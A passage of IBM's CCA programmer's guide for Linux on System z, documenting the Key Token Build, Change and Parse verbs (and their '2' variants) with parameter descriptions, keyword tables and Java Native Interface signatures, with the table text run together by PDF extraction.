single-length and +double-length keys. They use the key-form bits in byte 5 of the control vector (CV) to determine the length +of the key. To be consistent, in this implementation of CCA, both KEY-ENC and KEY-ENCD handle single- +and double-length keys. Both products effectively ignore the keywords, which are supplied only for +compatibility reasons. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKYTXJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKYTXJ are shown here. +Chapter5.ManagingAESandDEScryptographickeys 153 + +Key Test Extended (CSNBKYTX) +Format +public native void CSNBKYTXJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_identifier, +byte[] random_number, +byte[] verification_pattern, +byte[] kek_key_identifier); +154 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Token Build (CSNBKTB) +Key Token Build (CSNBKTB) +The Key Token Build verb assembles an external or internal key token in application storage from +information you supply. +This verb can include a control vector that you supply or can build a control vector based on the key type +and the control vector related keywords in the rule_array. The Key Token Build verb does not perform +cryptographic services on any key value. You cannot use this verb to change a key or to change the +control vector related to a key. +Format +CSNBKTB( +return_code, +reason_code, +exit_data_length, +exit_data, +key_token, +key_type, +rule_array_count, +rule_array, +key_value, +reserved_1, +reserved_2, +reserved_3, +control_vector, +reserved_4, +reserved_5, +reserved_6, +masterkey_verify_parm ) +Note: Previous implementations used the reserved_1 parameter to point to a four-byte integer or string +that represented the master key verification pattern. In current versions, CCArequires this +parameter to point to a four-byte value equal to binary zero. +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_token +Direction: Input/Output Type: String +The key_token parameter is a pointer to a string variable containing the assembled key_token. +Note: This variable cannot contain a key label. +key_type +Direction: Input Type: String +The key_type parameter is a pointer to a string variable containing a keyword that defines the key +type. The keyword is eight bytes in length and must be left-aligned and padded on the right with space +characters. +ValidAES key type keywords are: +CLRAES DATA +Valid DES key type keywords are: +Chapter5.ManagingAESandDEScryptographickeys 155 + +Key Token Build (CSNBKTB) +CIPHER DATAC IKEYXLAT OPINENC +CVARDEC DATAM IMPORTER PINGEN +CVARENC DATAMV IPINENC PINVER +CVARPINE DECIPHER KEYGENKY SECMSG +CVARXCVL DKYGENKY MAC +CVARXCVR ENCIPHER MACVER +DATA EXPORTER OKEYXLAT +Specify the USE-CV keyword to indicate that the key type should be obtained from the control_vector +variable. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 1, 2, 3, 4, 5, or 6. +rule_array +Direction: Input Type: String +One to four keywords that provide control information to the verb. The keywords must be in contiguous +storage with each of the keywords left-justified in its own 8-byte location and padded on the right with +blanks. For any key type, there are no more than four valid rule_array values. The rule_array +keywords are described in Table37. +Table37.KeywordsforKeyTokenBuildcontrolinformation +Keyword Description +Tokentype(Onerequired) +EXTERNAL Anexternalkeytoken. +INTERNAL Aninternalkeytoken. +Tokenalgorithm(One,optional) +AES AnAESkey. +DES ADESkey. +Keystatus(One,optional).NotvalidforCLRDES +KEY Thekeytokentobuildwillcontainanencryptedkey.Thekey_valueparameter +identifiesthefieldthatcontainsthekey. +NO-KEY Thekeytokentobuildwillnotcontainakey.Thisisthedefaultkeystatus. +CVsource(One,optional).NotvalidforCLRDES +CV Theverbistoobtainthecontrolvectorfromthevariableidentifiedbythe +control_vectorparameter. +NO-CV Thecontrolvectoristobesuppliedbasedonthekeytypeandthecontrol +vectorrelatedkeywords.Thisisthedefault. +| Key-wrappingmethod(One,optional) +|| WRAP-ENH Useenhancedkeywrappingmethod,whichiscompliantwiththeANSIX9.24 +| standard.ThiskeywordwasintroducedwithCCA4.1.0. +|| WRAP-ECB Useoriginalkeywrappingmethod,whichusesECBwrappingforDESkey +| tokensandCBCwrappingforAESkeytokens.Thiskeywordwasintroduced +| withCCA4.1.0. +| Translationcontrol(Optional) +|| ENH-ONLY Restrictrewrappingoftheoutput_key_token.Afterthetokenhasbeenwrapped +| withtheenhancedmethod,itcannotberewrappedusingtheoriginalmethod. +| ThiskeywordwasintroducedwithCCA4.1.0. +See Figure3 on page 30 for the key usage keywords that can be specified for a given key type. +156 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Token Build (CSNBKTB) +The difference between Key Token Parse (CSNBKTP) and Control Vector Generate (CSNBCVG) is +that Key Token Parse returns the rule_array keywords that apply to a parsed token, such as +EXTERNAL, INTERNAL, and so forth. These rule_array parameters are returned in addition to the +key_type parameter. +| AMEX-CSC DKYL0 EPINGEN KEYLN16 UKPT +| ANSIX9.9 DKYL1 EPINGENA LMTD-KEK VISA-PVV +| ANY DKYL2 EPINVER MIXED WRAP-ECB +| ANY-MAC DKYL3 EXEX NO-SPEC WRAP-ENH +| CLR8-ENC DKYL4 EXPORT NO-XPORT XLATE +| CPINENC DKYL5 GBP-PIN NOOFFSET XPORT-OK +| CPINGEN DKYL6 GBP-PINO NOT-KEK +| CPINGENA DKYL7 IBM-PIN OPEX +| CVVKEY-A DMAC IBM-PINO OPIM +| CVVKEY-B DMKEY IMEX PIN +| DALL DMPIN IMIM REFORMAT +| DATA DMV IMPORT SINGLE +| DDATA DOUBLE INBK-PIN SMKEY +| DEXP DPVR KEY-PART SMPIN +| DIMP ENH-ONLY KEYLN8 TRANSLAT +| Keywords ENH-ONLY, WRAP-ECB, and WRAP-ENH were introduced with CCA4.1.0. +key_value +Direction: Input Type: String +This parameter is a string variable containing the encrypted key-value incorporated into the +encrypted-key portion of the key token if you use the KEY rule_array keyword. Single-length keys must +be left-aligned in the variable and padded on the right (low-order) with eight bytes of X'00'. +control_vector +Direction: Input Type: String +Apointer to a 16-byte string variable. If this parameter is specified, and you use the CV rule_array +keyword, the variable is copied to the control vector field of the key token. See “Control vector table” +on page 463 for additional information. +masterkey_verify_parm +Direction: Input Type: String +Apointer to an 8-byte string variable. This value is inserted into the key token when you specify both +the KEY and INTERNALkeywords in the rule_array. +Restrictions +None +Required commands +None +Usage notes +Because 24-byte (TRIPLE) DES keys can only be generated as DATAkeys, capability to create 24-byte +DES tokens (with keywords TRIPLE or KEYLN24 has not been added to Key Token Build (CSNBKTB). +Instead, call Key Generate (CSNBKGN) directly. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKTBJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKTBJ are shown here. +Chapter5.ManagingAESandDEScryptographickeys 157 + +Key Token Build (CSNBKTB) +Format +public native void CSNBKTBJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_token, +byte[] key_type, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_value, +byte[] master_key_verification_pattern, +hikmNativeInteger reserved1, +byte[] reserved2, +byte[] control_vector, +byte[] reserved3, +hikmNativeInteger reserved4, +byte[] reserved5, +byte[] reserved6 ); +158 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Token Build2 (CSNBKTB2) +Key Token Build2 (CSNBKTB2) +| +| Use the Key Token Build2 verb to assemble an internal variable-length symmetric key-token in application +| storage from information that you supply. This verb assembles the information as a skeleton keyed hash +| MessageAuthentication Code (HMAC) internal key token. This skeleton token can be supplied to the Key +| Generate2 verb, which then provides a completed key token with the attributes of the skeleton along with +| a randomly generated key. These attributes become cryptographically bound to the key when it is +| enciphered. +| The Key Token Build2 verb cannot assemble a usable key-token that contains an enciphered key. It can +| assemble an internal HMAC key-token that has either a clear key, usable for a limited number of services, +| or no key, which is only usable for passing to the Key Generate2 verb in order to receive an enciphered +| key. +| The Key Token Build2 verb is a host-only verb and it does not use the cryptographic coprocessor. This +| verb does not perform cryptographic services on any key value. You cannot use this verb to change a key +| or to change the control vector related to a key. +Format +| +|| +CSNBKTB2( +| return_code, +| reason_code, +| exit_data_length, +| exit_data, +| rule_array_count, +| rule_array, +| clear_key_bit_length, +| clear_key_value, +| key_name_length, +| key_name, +| user_associated_data_length, +| user_associated_data, +| token_data_length, +| token_data, +| reserved_length, +| reserved +| target_key_token_length, +| target_key_token ) +| +Parameters +| +| For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +| “Parameters common to all verbs” on page 14. +| rule_array_count +|| Direction: Input Type: Integer +| The number of keywords you supplied in the rule_array parameter. The minimum value is 4. +| rule_array +|| Direction: Input Type: String +| The rule_array contains keywords that provide control information to the verb. The keywords must be +| in contiguous storage with each of the keywords left-justified in its own 8-byte location and padded on +| the right with blanks. The rule_array keywords are described in Table38 on page 160. +Chapter5.ManagingAESandDEScryptographickeys 159 + +Key Token Build2 (CSNBKTB2) +|| Table38.KeywordsforKeyTokenBuild2controlinformation +|| Keyword Description +| Tokentype(Required) +|| INTERNAL Specifiestobuildaninternalkeytoken. +| Tokenalgorithm(Required) +|| HMAC SpecifiestobuildanHMACkeytoken. +| Keystatus(One,optional) +|| NO-KEY Specifiestobuildthekeytokenwithoutakeyvalue.Thiscreatesaskeletonkeytokenthatcanlater +| besuppliedtotheKeyGenerate2verb.Thisisthedefault. +|| KEY-CLR Specifiestobuildthekeytokenwithaclearkeyvalue.Thiscreatesakeytokenthatcanbeused +| withtheKeyTest2verbtogenerateaverificationpatternforthekeyvalue. +| Keytype(Required) +|| MAC SpecifiesthatthiskeyisforMessageAuthenticationCodeoperations. +| Keymanagementrelatedkeywords(appliestoallkeytypes) +| Symmetric-keyexportkey-managementcontrol(One,optional) +|| NOEX-SYM Prohibitstheexportofthekeywithasymmetrickey. +|| XPRT-SYM Permitstheexportofthekeywithasymmetrickey.Thisisthedefault. +| Unauthenticatedasymmetric-keyexportkey-managementcontrol(One,optional) +|| NOEXUASY Prohibitstheexportofthekeywithanunauthenticatedasymmetrickey. +|| XPRTUASY Permitstheexportofthekeywithanunauthenticatedasymmetrickey.Thisisthedefault. +| Authenticatedasymmetric-keyexportkey-managementcontrol(One,optional) +|| NOEXAASY Prohibitstheexportofthekeywithanauthenticatedasymmetrickey. +|| XPRTAASY Permitstheexportofthekeywithanauthenticatedasymmetrickey.Thisisthedefault. +| Key-usagekeywords(thesearespecifictothekeytypespecified) +| MACkeyusage +| Generatekey-usagecontrol(Onerequired) +|| GENERATE SpecifiesthatthiskeycanbeusedtogenerateaMAC.AkeythatcangenerateaMACcanalso +| verifyaMAC. +|| VERIFY SpecifiesthatthiskeycannotbeusedtogenerateaMAC.ItcanonlybeusedtoverifyaMAC. +| Hashmethodkey-usagecontrol(anycombination,optional) +| Note: Allkeywordsinthelistbelowaredefaultsunlessoneormorekeywordsinthelistarespecified. +|| SHA-1 SpecifiesthattheSHA-1hashmethodisallowedforthekey. +|| SHA-224 SpecifiesthattheSHA-224hashmethodisallowedforthekey. +|| SHA-256 SpecifiesthattheSHA-256hashmethodisallowedforthekey. +|| SHA-384 SpecifiesthattheSHA-384hashmethodisallowedforthekey. +|| SHA-512 SpecifiesthattheSHA-512hashmethodisallowedforthekey. +| +| clear_key_bit_length +|| Direction: Input Type: Integer +| The length of the clear key in bits. Specify 0 when no key value is supplied or a valid HMAC key bit +| length, between 80 and 2048. +| clear_key_value +|| Direction: Input Type: String +160 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Token Build2 (CSNBKTB2) +| This parameter is used when the KEY-CLR keyword is specified. This parameter is the clear key value +| to be put into the token being built. +| key_name_length +|| Direction: Input Type: Integer +| The length of the key_name parameter. Valid values are 0 and 64. +| key_name +|| Direction: Input Type: String +| A64-byte key store label to be stored in the associated data structure of the token. +| user_associated_data_length +|| Direction: Input Type: Integer +| The length of the user-associated data. The valid values are 0 - 255 bytes. +| user_associated_data +|| Direction: Input Type: String +| User-associated data to be stored in the associated data structure. +| token_data_length +|| Direction: Input Type: Integer +| This parameter is reserved. This value must be 0. +| token_data +|| Direction: Ignored Type: String +| This parameter is ignored. +| reserved_length +|| Direction: Input Type: Integer +| This parameter is reserved. This value must be 0. +| reserved +|| Direction: Ignored Type: String +| This parameter is ignored. +| target_key_token_length +|| Direction: Input/Output Type: Integer +| On input, the length of the target_key_token parameter supplied to receive the token. On output, the +| actual length of the token returned to the caller. Maximum length is 725 bytes. +| target_key_token +|| Direction: Output Type: String +| The key token built by this verb. +Restrictions +| +| This verb was introduced with CCA4.1.0. +Required commands +| +| None +Chapter5.ManagingAESandDEScryptographickeys 161 + +Key Token Build2 (CSNBKTB2) +Usage notes +| +| None. +JNI version +| +| This verb has a Java Native Interface (JNI) version, which is named CSNBKTB2J. See “Building Java +| applications to use with the CCAJNI” on page 16. +| The parameters for CSNBKTB2J are shown here. +| +| Format +| public native void CSNBKTB2J( +| hikmNativeInteger return_code, +| hikmNativeInteger reason_code, +| hikmNativeInteger exit_data_length, +| byte[] exit_data, +| hikmNativeInteger rule_array_count, +| byte[] rule_array, +| hikmNativeInteger clear_key_bit_length, +| byte[] clear_key_value, +| hikmNativeInteger key_name_length, +| byte[] key_name, +| hikmNativeInteger user_associated_data_length, +| byte[] user_associated_data, +| hikmNativeInteger token_data_length, +| byte[] token_data, +| hikmNativeInteger reserved_length, +| byte[] reserved +| hikmNativeInteger target_key_token_length, +|| byte[] target_key_token ); +| +| +| +162 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Token Change (CSNBKTC) +Key Token Change (CSNBKTC) +Use the Key Token Change verb to re-encipher a DES key from encryption under the old master-key to +encryption under the current master-key and to update the keys in internal DES key-tokens. +Notes: +1. An application system is responsible for keeping all of its keys in a usable form. When the master key +is changed, the CEX3C implementations can use an internal key that is enciphered by either the +current or the old master-key. Before the master key is changed a second time, it is important to have +a key re-enciphered under the current master-key for continued use of the key. Use the Key Token +Change verb to re-encipher such a keys. +2. Previous implementations of IBM CCAproducts had additional capabilities with this verb such as +deleting key records and key tokens in key storage.Also, use of a wild card (*) was supported in those +implementations. +Format +CSNBKTC( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 1, 2, 3, or 4. +rule_array +Direction: Input Type:Array +The rule_array parameter is a pointer to a string variable containing an array of keywords. The +keywords are eight bytes in length and must be left-aligned and padded on the right with space +characters. The rule_array keywords are described in Table39. +Table39.KeywordsforKeyTokenChangecontrolinformation +Keyword Description +Re-enciphermentmethod(Required) +RTCMK Re-enciphersaDESkeytothecurrentmaster-keyinaninternalkey-tokeninapplicationstorageor +inkeystorage.Ifthesuppliedkeyisalreadyencipheredunderthecurrentmaster-keytheverb +returnsapositiveresponse(returncode0,reasoncode0).Ifthesuppliedkeyisencipheredunder +theoldmaster-key,thekeyisupdatedtoenciphermentbythecurrentmaster-keyandtheverb +returnsapositiveresponse(returncode0,reasoncode0).Othercasesreturnsomeformof +abnormalresponse. +Chapter5.ManagingAESandDEScryptographickeys 163 + +Key Token Change (CSNBKTC) +Table39.KeywordsforKeyTokenChangecontrolinformation (continued) +Keyword Description +RTNMK Re-enciphersaninternalDESkeytothenewmaster-key. +Akeyencipheredunderthenewmasterkeyisnotusable.Itisexpectedthattheuserwillusethis +keyword(RTNMK)totakeapreparatorystepinre-encipheringanexternalkeystorethatthey +managethemselvestoanewmaster-key,beforethesetoperationhasoccurred.Notealsothatthe +newmaster-keyregistermustbefull;itmusthavehadthelastkeypartloadedandthereforenot +beemptyorpartiallyfull(partiallyfullmeansthatoneormorekeypartshavebeenloadedbutnot +thelastkeypart). +The'SET'operationmakesthenewmaster-keyoperational,movingittothecurrentmaster-key +register,andthecurrentmaster-keyisdisplacedintotheoldmaster-keyregister.Whenthis +happens,allthekeysthatwerere-encipheredtothenewmaster-keyarenowusable,becausethe +newmaster-keyisnot'new'anymore,itis'current'. +BecausetheRTNMKkeywordisaddedprimarilyforsupportofexternallymanagedkeystorage +(see“KeyStorageonz/OS(RTNMK-focused)”onpage264,itisnotvalidtopassakey_identifer +whentheRTNMKkeywordisused.Onlyafullinternalkeytoken(encryptedunderthecurrent +master-key)canbepassedforre-enciphermentwiththeRTNMKkeyword.WhenakeyLABELis +passedalongwiththeRTNMKkeyword,theerrorreturncode8withreasoncode181willbe +returned. +Formoreinformation,see“KeystoragewithLinuxforIBMSystemz,incontrasttoz/OSforIBM +Systemz”onpage263. +|| REFORMAT Rewraptheinput_key_tokenwiththekeywrappingmethodspecified.Onlytheinput_KEK_identifier +| willbeused.Theoutput_KEK_identifierisignored.ThiskeywordwasintroducedwithCCA4.1.0. +Algorithm(Optional) +AES SpecifiesthatthekeytokenisforanAESkey. +DES SpecifiesthatthekeytokenisforaDESkey.Thisisthedefault. +| Keywrappingmethod(Optional) +|| USECONFG Wrapthekeyusingtheconfigurationsettingforthedefaultwrappingmethod.Thisisthedefault. +|| WRAP-ENH Useenhancedkeywrappingmethod,whichiscompliantwiththeANSIX9.24standard. +|| WRAP-ECB Useoriginalkeywrappingmethod,whichusesECBwrappingforDESkeytokensandCBC +| wrappingforAESkeytokens. +| Translationcontrol(Optional) +|| ENH-ONLY Restrictrewrappingoftheoutput_key_token.Afterthetokenhasbeenwrappedwiththeenhanced +| method,itcannotberewrappedusingtheoriginalmethod. +key_identifier +Direction: Input/Output Type: String +The key_identifier parameter is a pointer to a string variable containing the DES internal key-token or +the key label of an internal key-token record in key storage. +Restrictions +None +Required commands +| If you specify the RTCMK keyword, the Key Token Change verb requires the DES Key Token Change +| command (offset X'0090') to be enabled in the active role. +164 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Token Change (CSNBKTC) +| If you specify the REFORMAT keyword, the Key Token Change verb requires the CKDS Conversion2 - +| Allow use of REFORMAT command (offset X'014C') to be enabled in the active role. +| If you specify the WRAP-ECB or WRAP-ENH key wrapping method, and the default key-wrapping method +| setting does not match this keyword, theAllow Configuration Override with Keyword in KTC command +| (offset X'0146') must be enabled in the active role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKTCJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKTCJ are shown here. +Format +public native void CSNBKTCJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label ); +Chapter5.ManagingAESandDEScryptographickeys 165 + +Key Token Change2 (CSNBKTC2) +Key Token Change2 (CSNBKTC2) +| +| Use the Key Token Change2 verb to re-encipher a variable-length HMAC key from encryption under the +| old master-key to encryption under the current master-key and to update the keys in internal HMAC +| key-tokens. +| Notes: +| 1. An application system is responsible for keeping all of its keys in a usable form. When the master key +| is changed, the CEX3C implementations can use an internal key that is enciphered by either the +| current or the old master-key. Before the master key is changed a second time, it is important to have +| a key re-enciphered under the current master-key for continued use of the key. Use the Key Token +| Change2 verb to re-encipher such a keys. +| 2. Previous implementations of IBM CCAproducts had additional capabilities with this verb such as +| deleting key records and key tokens in key storage.Also, use of a wild card (*) was supported in those +| implementations. +Format +| +|| +CSNBKTC2( +| return_code, +| reason_code, +| exit_data_length, +| exit_data, +| rule_array_count, +| rule_array, +| key_identifier_length +| key_identifier ) +| +Parameters +| +| For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +| “Parameters common to all verbs” on page 14. +| rule_array_count +|| Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 2. +| rule_array +|| Direction: Input Type:Array +| The rule_array parameter is a pointer to a string variable containing an array of keywords. The +| keywords are eight bytes in length and must be left-aligned and padded on the right with space +| characters. The rule_array keywords are described in Table40. +|| Table40.KeywordsforKeyTokenChange2controlinformation +|| Keyword Description +| Re-enciphermentmethod(Required) +|| RTCMK Re-enciphersavariable-lengthHMACkeytothecurrentmaster-keyinaninternalkey-tokenin +| applicationstorageorinkeystorage.Ifthesuppliedkeyisalreadyencipheredunderthecurrent +| master-keytheverbreturnsapositiveresponse(returncode0,reasoncode0).Ifthesuppliedkeyis +| encipheredundertheoldmaster-key,thekeyisupdatedtoenciphermentbythecurrentmaster-keyand +| theverbreturnsapositiveresponse(returncode0,reasoncode0).Othercasesreturnsomeformof +| abnormalresponse. +166 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Token Change2 (CSNBKTC2) +| Table40.KeywordsforKeyTokenChange2controlinformation (continued) +|| Keyword Description +|| RTNMK Re-enciphersaninternalvariable-lengthHMACkeytothenewmaster-key. +| Akeyencipheredunderthenewmasterkeyisnotusable.Itisexpectedthattheuserwillusethis +| keyword(RTNMK)totakeapreparatorystepinre-encipheringanexternalkeystorethattheymanage +| themselvestoanewmaster-key,beforethesetoperationhasoccurred.Notealsothatthenew +| master-keyregistermustbefull;itmusthavehadthelastkeypartloadedandthereforenotbeemptyor +| partiallyfull(partiallyfullmeansthatoneormorekeypartshavebeenloadedbutnotthelastkeypart). +| The'SET'operationmakesthenewmaster-keyoperational,movingittothecurrentmaster-keyregister, +| andthecurrentmaster-keyisdisplacedintotheoldmaster-keyregister.Whenthishappens,allthekeys +| thatwerere-encipheredtothenewmaster-keyarenowusable,becausethenewmaster-keyisnot'new' +| anymore,itis'current'. +| BecausetheRTNMKkeywordisaddedprimarilyforsupportofexternallymanagedkeystorage(see +| “KeyStorageonz/OS(RTNMK-focused)”onpage264,itisnotvalidtopassakey_identiferwhenthe +| RTNMKkeywordisused.Onlyafullinternalkeytoken(encryptedunderthecurrentmaster-key)canbe +| passedforre-enciphermentwiththeRTNMKkeyword.Whenakeylabelispassedalongwiththe +| RTNMKkeyword,theerrorreturncode8withreasoncode181willbereturned. +| Formoreinformation,see“KeystoragewithLinuxforIBMSystemz,incontrasttoz/OSforIBMSystem +| z”onpage263. +| Algorithm(One,required) +|| HMAC SpecifiesthatthekeytokenisforanHMACkey. +| +| key_identifier_length +|| Direction: Input/Output Type: Integer +| The key_identifier_length parameter is a pointer to a string variable containing the length in bytes of +| the key_identifier parameter. This value must be 1 - 800. +| key_identifier +|| Direction: Input/Output Type: String +| The key_identifier parameter is a pointer to a string variable containing a variable-length HMAC +| internal key-token or the key label of an internal key-token record in key storage. +Restrictions +| +| This verb was introduced with CCA4.1.0. +Required commands +| +| If you specify the RTNMK keyword, this verb requires the Symmetric Key Token Change2 command (offset +| X'00F0') to be enabled in the active role. +| If you specify the RTCMK keyword, this verb requires the Symmetric Key Token Change2 - RTCMK +| command (offset X'00F1') to be enabled in the active role. +Usage notes +| +| None +JNI version +| +| This verb has a Java Native Interface (JNI) version, which is named CSNBKTC2J. See “Building Java +| applications to use with the CCAJNI” on page 16. +Chapter5.ManagingAESandDEScryptographickeys 167 + +Key Token Change2 (CSNBKTC2) +| The parameters for CSNBKTC2J are shown here. +| +| Format +| public native void CSNBKTC2J( +| hikmNativeInteger return_code, +| hikmNativeInteger reason_code, +| hikmNativeInteger exit_data_length, +| byte[] exit_data, +| hikmNativeInteger rule_array_count, +| byte[] rule_array, +| hikmNativeInteger key_identifier_length, +|| byte[] key_identifier ); +| +| +| +168 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Token Parse (CSNBKTP) +Key Token Parse (CSNBKTP) +The Key Token Parse verb disassembles a key token into separate pieces of information. This verb can +disassemble an external key token or an internal key token in application storage. +Use the key_token parameter to specify the key token to disassemble. +This verb returns some of the key token information in a set of variables identified by individual parameters +and the remaining key token information as keywords in the rule_array. +Control vector information is returned in keywords found in the rule_array when the verb can fully parse +the control vector. Otherwise, the verb returns return code 4, reason code 2039. +The Key Token Parse verb performs no cryptographic services. +Format +CSNBKTP( +return_code, +reason_code, +exit_data_length, +edit_data, +key_token, +key_type, +rule_array_count, +rule_array, +key_value, +MKVP, +reserved_2, +reserved_3, +control_vector, +reserved_4, +reserved_5, +reserved_6, +master_key_verification_pattern ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_token +Direction: Input Type: String +The key_token parameter is a pointer to a string variable in application storage containing an external +or internal key-token to be disassembled. +Note: You cannot use a key label for a key-token record in key storage. The key token must be in +application storage. +key_type +Direction: Output Type: String +The key_type parameter is a pointer to a string variable containing a keyword defining the key type. +The keyword is eight bytes in length and must be left-aligned and padded on the right with space +characters. Valid key_type keywords are shown here: +Chapter5.ManagingAESandDEScryptographickeys 169 + +Key Token Parse (CSNBKTP) +CIPHER DATAC IKEYXLAT OPINENC +CVARDEC DATAM IMPORTER PINGEN +CVARENC DATAMV IPINENC PINVER +CVARPINE DECIPHER KEYGENKY SECMSG +CVARXCVL DKYGENKY MAC +CVARXCVR ENCIPHER MACVER +DATA EXPORTER OKEYXLAT +rule_array_count +Direction: Input/Output Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be a minimum of 3. +On input, specify the maximum number of usable array elements that are allocated. On output, the +verb sets the value to the number of keywords returned to the application. +rule_array +Direction: Output Type:Array +The rule_array parameter is a pointer to a string variable containing an array of keywords that +expresses the contents of the key token. The keywords are eight bytes in length and are left-aligned +and padded on the right with space characters. The rule_array keywords are described in Table41. +Table41.KeywordsforKeyTokenParsecontrolinformation +Keyword Description +Tokentype(Onereturned) +INTERNAL Specifiesaninternalkey-token. +EXTERNAL Specifiesanexternalkey-token. +Keystatus(Onereturned) +KEY Indicatesthekeytokencontainsakey.Thekey_valueparametercontainsthekey. +NO-KEY Indicatesthekeytokendoesnotcontainakey. +| Key-wrappingmethod(Onereturned) +|| WRAP-ECB Thewrappingmethodforthiskeyislegacy.ThiskeywordwasintroducedwithCCA4.1.0. +|| WRAP-ENH Thewrappingmethodforthiskeyisenhanced.ThiskeywordwasintroducedwithCCA4.1.0. +Control-vector(CV)status(Onereturned) +CV Thekeytokenspecifiesthatacontrolvectorispresent.Theverbsetsthecontrolvectorvariable +withthevalueofthecontrolvectorfoundinthekeytoken. +NO-CV Thekeytokendoesnotspecifythepresenceofacontrolvector.Theverbsetsthecontrolvector +variablewiththevalueofthecontrolvectorvariablefoundinthekeytoken. +The difference between Key Token Parse (CSNBKTP) and Control Vector Generate (CSNBCVG) is +that Key Token Parse returns the rule_array keywords that apply to a parsed token, such as +EXTERNAL, INTERNALand so forth. These rule_array parameters are returned in addition to +key_type parameter. +| AMEX-CSC DKYL0 EPINGEN KEYLN16 UKPT +| ANSIX9.9 DKYL1 EPINGENA LMTD-KEK VISA-PVV +| ANY DKYL2 EPINVER MIXED WRAP-ECB +| ANY-MAC DKYL3 EXEX NO-SPEC WRAP-ENH +| CLR8-ENC DKYL4 EXPORT NO-XPORT XLATE +| CPINENC DKYL5 GBP-PIN NOOFFSET XPORT-OK +| CPINGEN DKYL6 GBP-PINO NOT-KEK +| CPINGENA DKYL7 IBM-PIN OPEX +| CVVKEY-A DMAC IBM-PINO OPIM +| CVVKEY-B DMKEY IMEX PIN +170 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Token Parse (CSNBKTP) +| DALL DMPIN IMIM REFORMAT +| DATA DMV IMPORT SINGLE +| DDATA DOUBLE INBK-PIN SMKEY +| DEXP DPVR KEY-PART SMPIN +| DIMP ENH-ONLY KEYLN8 TRANSLAT +key_value +Direction: Output Type: String +The key_value parameter is a pointer to a string variable. If the verb returns the KEY keyword in the +rule_array, the key_value parameter contains the 16-byte enciphered key. +MKVP +Direction: Output Type: Integer +The MKVP parameter is a pointer to an integer variable. The verb writes zero into the variable except +when parsing a version X'03' internal key-token. +reserved_2/5 +Direction: Output Type: Integer +The reserved_2 and reserved_5 parameters are either null pointers or pointers to integer variables. If +the parameter is not a null pointer, the verb writes zero into the reserved variable. +reserved_3/4 +Direction: Output Type: String +The reserved_3 and reserved_4 parameters are either null pointers or pointers to string variables. If +the parameter is not a null pointer, the verb writes eight bytes of X'00' into the reserved variable. +reserved_6 +Direction: Output Type: String +The reserved_6 parameter is either a null pointer or a pointer to a string variable. If the parameter is +not a null pointer, the verb writes eight space characters into the reserved variable. +control_vector +Direction: Output Type: String +The control_vector parameter is a pointer to a string variable in application storage. If the verb returns +the NO-CV keyword in the rule_array, the key token did not contain a control-vector value and the +control vector variable is filled with 16 space characters. +master_key_verification_pattern +Direction: Output Type: String +The master_key_verification_pattern parameter is a pointer to a string variable in application storage. +For version 0 key-tokens that contain a key, the 8-byte master key version number will be copied to +the variable. Otherwise the variable is filled with eight space characters. +Restrictions +None +Required commands +None +Chapter5.ManagingAESandDEScryptographickeys 171 + +Key Token Parse (CSNBKTP) +Usage notes +Be aware that Key Token Parse (CSNBKTP) will fail (return code 8, reason code 49) when given a DES +INTERNALkey token that is version X'01'. These tokens are DOUBLE and TRIPLE length DES +INTERNALDATAkey tokens. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBKTPJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBKTPJ are shown here. +Format +public native void CSNBKTPJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_token, +byte[] key_type, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_value, +hikmNativeInteger master_key_verification_pattern_v3, +hikmNativeInteger reserved_field_2, +byte[] reserved_field_3reserved_field_3, +byte[] control_vectorcontrol_vector, +byte[] reserved_field_4, +hikmNativeInteger 